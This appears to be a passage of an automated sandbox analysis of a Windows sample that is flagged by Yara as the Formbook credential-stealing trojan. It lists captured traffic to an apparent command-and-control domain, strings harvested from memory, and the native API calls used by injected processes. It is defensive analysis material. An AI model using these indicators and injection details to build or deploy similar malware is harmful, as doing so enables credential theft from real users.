6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 
72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Jul 2024 05:58:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8a503df80991c3f3-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, must-revalidate, max-age=0Content-Encoding: gzipExpires: Wed, 11 Jan 1984 05:00:00 GMTLink: <https://goodneighbor.club/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodingki-cache-type: NoneKi-CF-Cache-Status: BYPASSki-edge: v=20.2.7;mv=3.0.6ki-origin: g1pX-Content-Type-Options: nosniffX-Edge-Location-Klb: 1Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SEQf5%2FIrQiQoCKW%2FBybMEY41uWUgUEQS7raVchR2BnLK1CgurKUN0mU%2FOMTVQ1%2BqFQSOm40h3LJ1hwTW0ZICJXmRoZuR%2BrEvdD4U8OB8q0EiWa%2Fuh6110%2Fw3cNWwurO5d2R6I55Yug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflarealt-svc: h3=":443"; ma=86400Data Raw: 33 35 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd eb 9a db 38 92 28 f8 db fe be 7d 07 9a e5 4a 49 9d 24 53 52 5e 6c 4b 96 7d 5c 2e 57 b7 67 7c a9 f5 a5 fb f4 38 fd e9 50 22 a5 a4 4d 89 6a 92 ca 74 b6 ac 7d 8d 7d a0 7d b1 8d 0b 00 82 37 5d 32 5d 3d 33 df 39 ae ee 14 09 04 02 81 40 20 10 11 00 81 c7 f7 bc 68 9c 5e 2f 7c e3 22 9d 85 4f ee 3e c6 1f 23 74 e7 d3 81 e9 cf ed 8f ef 4d 4c f3 5d ef c9 dd 3b 8f 67 7e ea 1a e3 0b 37 4e fc 74 60 7e fc f0 9b fd d0 54 e9 73 77 e6 0f cc cb c0 bf 5a 44 71 6a 1a e3 68 9e fa 73 80 bb 0a bc f4 62 e0 f9 97 c1 d8 b7 e9 c5 32 82 79 90 06 6e 68 27 63 37 f4 07 1d c2 12 06 f3 af 46 ec 87 03 73 11 47 93 20 f4 4d e3 22 f6 27 03 f3 22 4d 17 49 ef e8 68 3a 5b 4c 9d 28 9e 1e 7d 9b cc 8f 3a 5c 28 0d d2 d0 7f f2 bb 3b f5 8d 79 94 1a 93 68 39 f7 8c 83 9f 1e 76 3b 9d be f1 e7 28 f2 8c 37 7e Data Ascii: 35568(}JI$SR^lK}\.Wg|8P"Mjt}}}7]2]=39@ h^/|"O>#tML];g~7Nt`~TswZDqjhsb2ynh'c7FsG M"'"MIh:[L(}:\(;yh9v;(7~
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Jul 2024 05:58:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8a503e082d0d4246-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, must-revalidate, max-age=0Content-Encoding: gzipExpires: Wed, 11 Jan 1984 05:00:00 GMTLink: <https://goodneighbor.club/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodingki-cache-type: NoneKi-CF-Cache-Status: BYPASSki-edge: v=20.2.7;mv=3.0.6ki-origin: g1pX-Content-Type-Options: nosniffX-Edge-Location-Klb: 1Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ad0W2w0wl6If6OWHGdWt13wNg%2BIKcMVl3xFBOM4VB72RaAXN67ITfJ7x%2BhWgwldMTC%2FIiNRbS2lWx2wf8rBFSpFkq6vUnihvUfSUcXS1cHake1zvFsMBAbBB2THdrosZhi7s4D6ZjA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflarealt-svc: h3=":443"; ma=86400Data Raw: 64 63 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd eb 9a db 38 92 28 f8 db fe be 7d 07 9a e5 4a 49 9d 24 53 52 5e 6c 4b 96 7d 5c 2e 57 b7 67 7c a9 f5 a5 fb f4 38 fd e9 50 22 a5 a4 4d 89 6a 92 ca 74 b6 ac 7d 8d 7d a0 7d b1 8d 0b 00 82 37 5d 32 5d 3d 33 df 39 ae ee 14 09 04 02 81 40 20 10 11 00 81 c7 f7 bc 68 9c 5e 2f 7c e3 22 9d 85 4f ee 3e c6 1f 23 74 e7 d3 81 e9 cf ed 8f ef 4d 4c f3 5d ef c9 dd 3b 8f 67 7e ea 1a e3 0b 37 4e fc 74 60 7e fc f0 9b fd d0 54 e9 73 77 e6 0f cc cb c0 bf 5a 44 71 6a 1a e3 68 9e fa 73 80 bb 0a bc f4 62 e0 f9 97 c1 d8 b7 e9 c5 32 82 79 90 06 6e 68 27 63 37 f4 07 1d c2 12 06 f3 af 46 ec 87 03 73 11 47 93 20 f4 4d e3 22 f6 27 03 f3 22 4d 17 49 ef e8 68 3a 5b 4c 9d 28 9e 1e 7d 9b cc 8f 3a 5c 28 0d d2 d0 7f f2 bb 3b f5 8d 79 94 1a 93 68 39 f7 8c 83 9f 1e 76 3b 9d be f1 e7 28 f2 8c 37 7e 30 bd 18 45 b1 f1 3c 5c 8e Data Ascii: dc08(}JI$SR^lK}\.Wg|8P"Mjt}}}7]2]=39@ h^/|"O>#tML];g~7Nt`~TswZDqjhsb2ynh'c7FsG M"'"MIh:[L(}:\(;yh9v;(7~0E<\
                Source: Inquiry files v2.exe, WOzeoJQi.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: Inquiry files v2.exe, WOzeoJQi.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: Inquiry files v2.exe, WOzeoJQi.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
                Source: Inquiry files v2.exe, 00000000.00000002.2222224307.0000000003027000.00000004.00000800.00020000.00000000.sdmp, WOzeoJQi.exe, 00000009.00000002.2482574728.00000000027F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Inquiry files v2.exe, 00000000.00000002.2222224307.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, WOzeoJQi.exe, 00000009.00000002.2482574728.000000000279C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/AppRepairsDataSet.xsd
                Source: Inquiry files v2.exe, WOzeoJQi.exe.0.dr | String found in binary or memory: http://tempuri.org/AppRepairsDataSet.xsdkNo
                Source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3374402396.00000000016DB000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.goodneighbor.club
                Source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3374402396.00000000016DB000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.goodneighbor.club/qt04/
                Source: runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: runas.exe, 00000010.00000002.3372111139.0000000003094000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: runas.exe, 00000010.00000002.3372111139.0000000003094000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: runas.exe, 00000010.00000003.2890424029.00000000080BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: runas.exe, 00000010.00000002.3372111139.0000000003094000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: runas.exe, 00000010.00000002.3372111139.0000000003094000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10338
                Source: runas.exe, 00000010.00000002.3372111139.0000000003094000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: runas.exe, 00000010.00000002.3372111139.0000000003094000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: Inquiry files v2.exe, WOzeoJQi.exe.0.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2580516163.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.3374604831.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2569102143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.3374530028.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.3375661404.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.2571952435.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.2580516163.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000010.00000002.3374604831.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.2569102143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000010.00000002.3374530028.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000F.00000002.3375661404.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.2571952435.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0042BE53 NtClose
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2B60 NtClose, LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2DF0 NtQuerySystemInformation, LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2C70 NtFreeVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F35C0 NtCreateMutant, LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F4340 NtSetContextThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F4650 NtSuspendThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2BA0 NtEnumerateValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2B80 NtQueryInformationFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2BE0 NtQueryValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2BF0 NtAllocateVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2AB0 NtWaitForSingleObject
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2AF0 NtWriteFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2AD0 NtReadFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2D30 NtUnmapViewOfSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2D00 NtSetInformationFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2D10 NtMapViewOfSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2DB0 NtEnumerateKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2DD0 NtDelayExecution
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2C00 NtQueryInformationProcess
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2C60 NtCreateKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2CA0 NtQueryInformationToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2CF0 NtOpenProcess
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2CC0 NtQueryVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2F30 NtCreateSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2F60 NtCreateProcessEx
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2FA0 NtQuerySection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2FB0 NtResumeThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2F90 NtProtectVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2FE0 NtCreateFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2E30 NtWriteVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2E80 NtReadVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F2EE0 NtQueueApcThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F3010 NtOpenDirectoryObject
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F3090 NtSetValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F39B0 NtGetContextThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F3D10 NtOpenProcessToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012F3D70 NtOpenThread
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Code function: 0_2_0141D5BC
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Code function: 0_2_0613CCD0
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Code function: 0_2_0613CCC0
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Code function: 0_2_076DC1A8
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Code function: 0_2_076D2D70
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Code function: 0_2_076DD9BF
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Code function: 0_2_076DF738
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Code function: 0_2_076D82D8
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Code function: 0_2_076D6280
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Code function: 0_2_076D5E48
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Code function: 0_2_076D2D61
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Code function: 0_2_076D5A10
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Code function: 0_2_076D7928
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Code function: 0_2_07E75EA0
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Code function: 0_2_07E7DEC8
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Code function: 0_2_07E7DEB9
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Code function: 0_2_07E75E92
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Code function: 0_2_07E75C40
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Code function: 0_2_07E75C30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00403020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0041699E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_004169A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00402AEC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00404445
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0042E463
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0040FC03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0040FE23
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0040DEA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012B0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0135A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01348158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_013801AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_013741A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_013781CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01352000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0137A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012CE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_013803E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01360274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_013402C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012C0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01380591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01364420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01372446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0136E4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012C0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012E4750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012BC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012DC6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012D6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012C29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0138A9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012CA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012C2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012A68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012EE8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0137AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01376BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012BEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0135CD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012CAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012D8DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012BADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012C0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01360CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012B0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01362F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01302F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012E0F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_01334F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0133EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012CCFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012B2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0137EE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012C0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0137CE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_012D2E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137EEDB7_2_0137EEDB
